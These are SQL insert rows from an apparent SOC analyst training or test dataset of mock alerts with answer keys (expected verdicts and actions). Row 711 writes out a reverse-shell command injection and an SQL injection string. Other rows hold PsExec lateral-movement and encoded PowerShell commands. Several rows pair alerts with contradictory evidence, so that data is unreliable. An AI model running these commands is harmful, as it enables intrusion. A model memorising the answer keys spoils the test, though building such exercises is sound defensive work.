(703, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon associated with LockBit 3.0 ransomware campaign was detected communicating with a known malicious IP. The beacon exhibited process hollowing tactics.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.55\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-WS01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\temp.dll,EntryPoint\",\"file_hash\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"domain\":\"malicious-domain.com\"}', '2026-01-10 14:55:24', '2026-02-16 18:04:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1003 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as LockBit 3.0 ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious hash and IP, along with Cobalt Strike beacon activity, confirms the attack. Because the beacon used process hollowing, the injected code exists only in memory: capture a memory image of FINANCE-WS01 before remediation and treat the on-disk temp.dll hash as one indicator rather than the whole payload. The DLL was loaded by rundll32.exe from the user profile (AppData Roaming), which is a location worth sweeping on other hosts for the same file.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"FINANCE-WS01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"rundll32.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\temp.dll,EntryPoint\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"rundll32.exe\"}]}}', 0),
(704, 'Suspicious Network Traffic to Fast-Flux DNS Domain', 'high', 'Firewall', 'Network traffic to a domain exhibiting fast-flux characteristics was detected. The domain is known to be associated with the BlackCat/ALPHV ransomware group.', 'Command and Control', 'T1071', 1, 'investigating', 296, '{\"timestamp\":\"2026-01-11T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.120\",\"domain\":\"fluxy-malicious.com\"}', '2026-01-10 21:54:13', '2026-03-14 21:30:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"fluxy-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux and BlackCat C2 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected client\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The fast-flux domain and known association with ransomware C2 activity confirm the threat. Because a fast-flux domain rotates its resolved IPs rapidly, blocking 203.0.113.120 alone will not stop the beacon: block or sinkhole the domain at DNS as well, and review DNS logs for any other internal hosts that resolved it.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"08:15:29\",\"src\":\"192.168.1.100\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"08:15:30\",\"src\":\"192.168.1.100\",\"dst\":\"203.0.113.120\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(705, 'False Positive: Suspected Phishing from Internal Domain', 'medium', 'Proofpoint', 'An email flagged as phishing due to a similar domain name was found to be sent from a legitimate internal source. The email appeared suspicious due to its subject line and formatting.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"email_sender\":\"alerts@internal-domain.com\",\"subject\":\"Urgent: Update Your Password Immediately\",\"url\":\"https://internal-domain.com/security-update\"}', '2026-01-10 05:58:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@internal-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate email from internal domain\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://internal-domain.com/security-update\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified internal URL\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a legitimate internal source and was incorrectly flagged due to its subject and formatting. Base the decision on the authentication results (SPF and DKIM passing for internal-domain.com) and on the link resolving to the internal host, not on the display name or sender address alone: this subject and URL pattern is exactly what credential phishing imitates, and a lookalike domain or a failed authentication check would make it a true positive.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"alerts@internal-domain.com\",\"to\":\"employee@internal-domain.com\",\"subject\":\"Urgent: Update Your Password Immediately\",\"date\":\"2026-02-01T20:32:22.351Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[],\"body_preview\":\"Your password is due to expire. Please update it at https://internal-domain.com/security-update ...\",\"security_check\":\"PASS - SPF/DKIM aligned with internal-domain.com\"}}', 0),
(706, 'APT Lateral Movement via PsExec Detected', 'high', 'Wazuh', 'An APT actor was detected using PsExec for lateral movement within the network, targeting several internal hosts over SMB.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:30:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\"}', '2026-01-11 08:30:21', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP address of the initiating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP address of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected, often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PsExec for lateral movement is a known tactic of APT groups, confirming the suspicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(707, 'Brute Force Login Attempt Detected', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address. The source is from a foreign location.', 'Credential Attack', 'T1110', 1, 'Investigating', 52, '{\"timestamp\":\"2026-01-11T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-09 17:39:12', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and the source IP\'s malicious history confirm this as a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(708, 'Malware Detected on Endpoint', 'critical', 'CrowdStrike', 'A known malware signature was detected on an endpoint. The malware has a high detection rate on VirusTotal.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\malicious\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 06:01:10', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60/70 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"CrowdStrike\",\"verdict\":\"malicious\",\"details\":\"Confirmed execution of known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is widely recognized as malicious, indicating a confirmed malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(709, 'Phishing Email with Malicious Link Detected', 'medium', 'Proofpoint', 'A phishing email was detected with a link leading to a known malicious site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:20:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"email_sender\":\"phisher@malicious.com\",\"url\":\"http://malicious-site.com/fake-login\",\"username\":\"jdoe\",\"hostname\":\"user-laptop-03\"}', '2026-01-10 16:11:58', '2026-02-15 05:02:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Proofpoint\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign sender\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/fake-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site hosting phishing login page\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing sites\"}}],\"expected_actions\":[\"block_url\",\"close_alert\",\"user_education\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.355Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(710, 'Suspicious Network Activity Detected', 'low', 'Firewall', 'An unusual spike in outbound traffic was detected from an internal server, but no malicious activity was confirmed.', 'Data Exfiltration', 'T1041', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:15:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"internal-server-01\",\"bytes_sent\":5000000}', '2026-01-09 23:38:05', '2026-02-13 18:56:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in benign traffic, no confirmed malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Traffic was determined to be a legitimate data transfer after further analysis.\"}', 'Novice', 'NDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(711, 'APT41 Command Injection Detected', 'high', 'Wazuh', 'A command injection attempt was identified on a web server. The attacker executed a shell command which could allow them to gain unauthorized access to the system.', 'Web Attack', 'T1059', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"webadmin\",\"hostname\":\"web-server-01\",\"command_line\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\"}', '2026-01-09 18:42:52', '2026-02-16 02:42:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection attempt with a known malicious IP confirms the alert as true positive.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
